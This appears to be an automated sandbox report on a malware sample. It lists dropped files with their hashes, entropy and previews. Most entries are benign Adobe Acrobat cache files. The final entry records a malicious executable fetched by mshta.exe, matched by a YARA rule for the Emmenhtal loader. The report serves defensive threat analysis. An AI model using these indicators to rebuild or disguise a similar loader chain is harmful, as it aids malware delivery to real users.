                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):285
                                                                        Entropy (8bit):5.343740476786632
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfPmwrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GH56Ukee9
                                                                        MD5:3402F9C7D36FA3DABCC43024721914B0
                                                                        SHA1:7820DF05793B7E08473853A3A430778EC643AF6B
                                                                        SHA-256:C068D69DFA3DF7EFFEDD6EF538B8C6856C68E862FC2DD605B588E6FEBEB8B5A2
                                                                        SHA-512:CC373CAE0179367315384FDD1B6D45779B74CBBE584871C92CB7EF7380434B5D31AF4FA99AE41F2A2991234E95C8B9611D884386A1AEDA6ABC623A12DAB2E704
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1123
                                                                        Entropy (8bit):5.690349851644639
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6X7PIJhqpLgE9cQx8LennAvzBvkn0RCmK8czOCCSO:YvkIJhqhgy6SAFv5Ah8cv/O
                                                                        MD5:38E36501F7C6A722F3EA183FD0A6F770
                                                                        SHA1:665CE2410275B756EED8AE64AEB38767DCF06DE1
                                                                        SHA-256:5876E53D198312ED36B00AEEDA61D0C71D05EB4E31CF1F26B01D1A7B4A20D9E9
                                                                        SHA-512:08F4EF40A7F034D061EF630E96DD41FD0F875F3C50100D77C20DA3A7CB9E6313153F2C5087C9A256888F4215253CD0C59CAA2B7FA8261670719FCF2B27D7860B
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.292913311935147
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJf8dPeUkwRe9:YvXKX7PJSvR/ZwHAz9GU8Ukee9
                                                                        MD5:8321E27678AA0D50EFE50ADB14D51834
                                                                        SHA1:BE8B1EDF721C3EC1DAE4778938F102BFEC940461
                                                                        SHA-256:52CD9FACFDF12F2E35D7EE1CCAD8EE7B94A0970B1438949786B310EAF2DC0BAF
                                                                        SHA-512:9144175CBAA431D6D588847754EF3486F99C778456F4CC26EFF4D4C4B2C3ECB2367689D90FD332FDDF3908C2693C4F3624121A8E3796FBEA02572C8ED4E863A6
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):5.2910264637830196
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfQ1rPeUkwRe9:YvXKX7PJSvR/ZwHAz9GY16Ukee9
                                                                        MD5:2AE99F5CD1AA3D99135DD433F72FA093
                                                                        SHA1:1C60213597251F0FD000D050B850F7B171A9BE6E
                                                                        SHA-256:A4C5284B3AC3519E2B69F20E651F30ED2383D75759B2C77E155744CE377DBEFE
                                                                        SHA-512:6BCF9A53DDFF2891E3B5DFA221D63B4C439E61FDD61258E2E1FA7A1163ABCF91A3DD9C5DDB3DD13373B5D114772BA03E5D620E9D53AE416326272F8EA9AA7EAB
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.30783533589309
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfFldPeUkwRe9:YvXKX7PJSvR/ZwHAz9Gz8Ukee9
                                                                        MD5:03A9888A8AE78F9624E932C4166CD204
                                                                        SHA1:1296FE1855BD45C686272822314BC16A20319D3C
                                                                        SHA-256:07557CDE74BE40A2B19A5E74DE679B99923625D00377272C29A5CCB4C2B97259
                                                                        SHA-512:17287CD7B42B8C41BB34EC316C27E20D5837E22C0ED83D182A52734FD7968C12B30EBA9BD07D8DB74B239FC33209EDD5D4850B85E459D8FCECB803A3B6F5AF78
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):295
                                                                        Entropy (8bit):5.322403844735917
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfzdPeUkwRe9:YvXKX7PJSvR/ZwHAz9Gb8Ukee9
                                                                        MD5:AE04DE4E2BB89E25F8C1C82E88AB202D
                                                                        SHA1:39B4EB9F9EBDDEC91C5BCFE2A539AB324A348AC1
                                                                        SHA-256:31905F139E018C7E01C90302897504350C5CE29576F2AB4CD55177EC1F0FB5A6
                                                                        SHA-512:9053070E3C4446EDFC2FA90051867F90D600BE1344891D95DB4B9348E330F6ED26890471B828C4C7FF82EB5845072B4319BC637CD77E74DBD2080C5D05F23232
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.302504683302236
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfYdPeUkwRe9:YvXKX7PJSvR/ZwHAz9Gg8Ukee9
                                                                        MD5:28B7DF2BF2FAAF53C5786E1ED9016822
                                                                        SHA1:8CE5D4A8370B3B7D3C2BD108D3EE27D48DDB0F18
                                                                        SHA-256:607DAB96F8BDD5AABB09344CE79C3EED0F75F4BB0705682BDFD8D30A5A9E6368
                                                                        SHA-512:009910CEBBF682A484315D6630DFDE6B1F281555C7666F80B8DDFC373400635B4448278AA3AAFEE1A10F4430A81A14496818279AF9ADD9227518EFA97A6CA7A7
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):284
                                                                        Entropy (8bit):5.288599152662121
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJf+dPeUkwRe9:YvXKX7PJSvR/ZwHAz9G28Ukee9
                                                                        MD5:D820AEAFE903EB037F93EBAA29F6D1EA
                                                                        SHA1:9B2232F9358811168D1D31FA811E3902CA80AE05
                                                                        SHA-256:7902A317A5CAF551898DAF22474788E23C9D858AC60F9B3E0F8ACBC01CC60297
                                                                        SHA-512:BD735D0AF86E9C6287DD70C2448CE38E8FA23738618D9F20CA29082F7D7025C9028018EF59AFD3AD6D6CC70840772F3A117C2887EBF732B58390C51B962009F8
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):291
                                                                        Entropy (8bit):5.28603456665787
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfbPtdPeUkwRe9:YvXKX7PJSvR/ZwHAz9GDV8Ukee9
                                                                        MD5:D8A1AAD643B71CD726B5D8B0165456C4
                                                                        SHA1:47B73434821A74B3F13CDBF24E90543BB5C8E06F
                                                                        SHA-256:00183BDA5B3C2F09747B3DE18EABABE796A255486B60E8BBFB0AB371E99C5EF2
                                                                        SHA-512:2F10FE2B02D6E8BFD7E66FAF02C2DD5BF44B0204E44619D87DA4E77641619AD9713EB0F68FDE1B8063929574BEEB4C8E4BA7208BDC87E14139851C79654A9B85
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):287
                                                                        Entropy (8bit):5.28446243436575
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJf21rPeUkwRe9:YvXKX7PJSvR/ZwHAz9G+16Ukee9
                                                                        MD5:58F7D3C540AF87964DAE3A036EBBF68F
                                                                        SHA1:3178866B7B425AD8F47583B990DFD56C27309D8B
                                                                        SHA-256:B9AB70DAB4E841FDD49CF53D2BEC33118DFD5B6489EBA4D5A662BFF6C209FD13
                                                                        SHA-512:DA3274759D8EABF74A322A62F499682E858E3F824158D38B00E63B63F17B4C8A3FC55460CA9604EED8D459D2E27B52FF9E96734B6FE2C1EBF84FE068AC443E5A
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1090
                                                                        Entropy (8bit):5.66437557577195
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6X7PIJh2amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSO:YvkIJh4BgkDMUJUAh8cvMO
                                                                        MD5:D5374561CEB4F77AD63FE61BAAC8E54C
                                                                        SHA1:941A265488EB6E8D1BD2750ACC79CD771CD4B417
                                                                        SHA-256:586253CF88154014A7F993E23F26CE45462852844FB34C0875CFE48721A80ABA
                                                                        SHA-512:20686622969A81EA9E0025B3A02C856F633EDB6FC7D86FF5B1582DF211CC454D93072588C6AECA6B89FDCC63E049044EF58FD158CE41EBC6AB447333B2F1053E
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):286
                                                                        Entropy (8bit):5.25943012538504
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfshHHrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GUUUkee9
                                                                        MD5:0E62D631A9B8F2C8592F2ACD55FA4F7D
                                                                        SHA1:097420145FD857DD21195A4334D1D3C9D82C0B94
                                                                        SHA-256:4CE25228F4C252D0413C5B7846A12354A74DE2E832C58E6B15164490C4F25BE2
                                                                        SHA-512:68654A549E1285AF27D37F3A90F3A2A8B46BE557B736585332D36C634D721D3B8459A2BFD2E89DD1963CADC598763FD51AE4E50A54674E5E0C470E546F6A54F8
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):282
                                                                        Entropy (8bit):5.2766403551917564
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJTqgFCrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GTq16Ukee9
                                                                        MD5:27418CF6C47F76113E01246E6617A153
                                                                        SHA1:C93F5AA5D0318D8E5324089CD491943F381DA646
                                                                        SHA-256:C5735D875DD4103544BBE6E0D796C679DC601D4C14297480DA3B951DD6291E80
                                                                        SHA-512:77875B549C1980F29B3F9231C255B7E500D2E4B3A42F225CE3F9D2C9637CA7FDC68A2B10019EE5D78534DD1E7CB4B2721AB708220322EE089337093D1186DB93
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4
                                                                        Entropy (8bit):0.8112781244591328
                                                                        Encrypted:false
                                                                        SSDEEP:3:e:e
                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                        Malicious:false
                                                                        Preview:....

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):2814
                                                                        Entropy (8bit):5.142761468949437
                                                                        Encrypted:false
                                                                        SSDEEP:24:YQtaz4Tsayti8VzZjj4/BRX7iJJaDj8yj0S9Fpyl2M2LSXCVe/GeUE3/dT25Nscg:YBAMng/B78E/kVJimGeUmEjSz9qq3l
                                                                        MD5:2B9A02835241E8445BACA3130C0FB651
                                                                        SHA1:17FCA704817D46C2FF4757CDC5C2A58FE279512C
                                                                        SHA-256:5CF63D337B9D249DC590BCFBC7206A745EAFCD29D11F043A817B9F8410BA8EC6
                                                                        SHA-512:D28FFDD50BABA2EB6EC8B4863DE7DBDEE02CF65DB09F67B539553A4411DBE99761526D85D4D18E9C2F086AFD3CF14817C9B0817FA7C4C881E1E7852CD98D3C8E
                                                                        Malicious:false
                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"063ec1aa6d5fa01681a1c3c7c3efbba0","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735286736000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"5034ffefe015f2b40928a38514e21890","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735286736000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"db91b9e0b3e9ad3a522e3e1ebe0ac44b","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735286736000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"15e1712842ac0b548578ffde1ca3b6bd","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735286736000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"104350db842931c85749ac6c799cf791","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735286736000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"9ab8192a0c1c178a12636aad1eb2e8fd","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                        Category:dropped
                                                                        Size (bytes):12288
                                                                        Entropy (8bit):1.3175872268648143
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMe/SN/tqI:TGufl2GL7ms9WR1CPmPbPah41ypilI+N
                                                                        MD5:9B99915D9E161A81C58F0A9E808C60D1
                                                                        SHA1:A5077184C0D5A012DFBBA476EE016C51F4B3D848
                                                                        SHA-256:2481A3CF4672AB9DE2F6B13793DA244F3E3B3C2CDD9A3AB63168A219DC83D913
                                                                        SHA-512:C87474FB1192A070D6BFAC5610CF52E046A9ACB6046BEFF83140F196C439BE3F32ABE2E0BDEF99A80D8ABF753FD3ECA6DF0918FBE6A022A8A2D752CF22CBB9D3
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite Rollback Journal
                                                                        Category:dropped
                                                                        Size (bytes):8720
                                                                        Entropy (8bit):1.7801031984412063
                                                                        Encrypted:false
                                                                        SSDEEP:48:7MNWR1CPmPbPah4wypilIEqFl2GL7msqB:7wWfMwbPah4wRKVmsqB
                                                                        MD5:02804CA2470044375D7DD7A3698D1F0E
                                                                        SHA1:DF5677B464B3745A471853F89E56AAFB117E1181
                                                                        SHA-256:67095B857534BC8BBFD0EDCB7AC5AADFE4EA14498E8ED6A213B25FF073FBAEEB
                                                                        SHA-512:FA8AAC373ACAF98D975ABB2722C6EC5DDD04B58F9294888CD63C946EA241C03FBB006C6D65A76959D6977E3D2DC9CB0773B796EE52D4578E2250411E6E484B4C
                                                                        Malicious:false
                                                                        Preview:.... .c....../...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                        Download File
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):66726
                                                                        Entropy (8bit):5.392739213842091
                                                                        Encrypted:false
                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgeQW/SLLLfJVTGtdiA3VQQnVWI+dq6Yyu:6a6TZ44ADEo/SLLLfJ6dz3VRgq6K
                                                                        MD5:D19B2BFF329761594D580F23F42647B7
                                                                        SHA1:E49BEE537CF370D384F8113D8CEF462864043641
                                                                        SHA-256:FFFDE060082820002FF8627C44823C6EFBF6F90DD15196BBB48378C4252AA685
                                                                        SHA-512:87B3001F1DC31175A9394473FC926B994CF123321C30EC0809003FEF4EBCD27C04C741D2ECC7A814CBD583FB8D6E7D961B4A3B82FF9724F1C4208C7041C1D585
                                                                        Malicious:false
                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]

                                                                        Download File
                                                                        Process:C:\Windows\System32\mshta.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):441463
                                                                        Entropy (8bit):6.364890576549753
                                                                        Encrypted:false
                                                                        SSDEEP:6144:IhaNDyEJXsEy62haNDyEJXsEy6fhaNDyEJXsEy6VhaNDyEJXsEy64haNDyEJXsEV:Hj186Nj186Oj186Uj186Xj186Z
                                                                        MD5:AEDD426C8C15EA3B78206A4BDDA8BC8F
                                                                        SHA1:0F4DE775E0E447B6492C5482FD1A500C9BA01742
                                                                        SHA-256:B01B095131B661996AD3F97DB0FD9C57FE3174C59ED08645406403F76F7EF6FD
                                                                        SHA-512:4971F47BFCD1EFEBB6A2D2E5D7FCFBD41ACAABF271A74A0925870517BCED412EF49E3D4675AE6806F8D023605E07EBF148B5A2C7D02629C54A5D5E817C23707E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: emmenhtal_strings_hta_exe, Description: Emmenhtal Loader string, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1], Author: Sekoia.io
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 37%
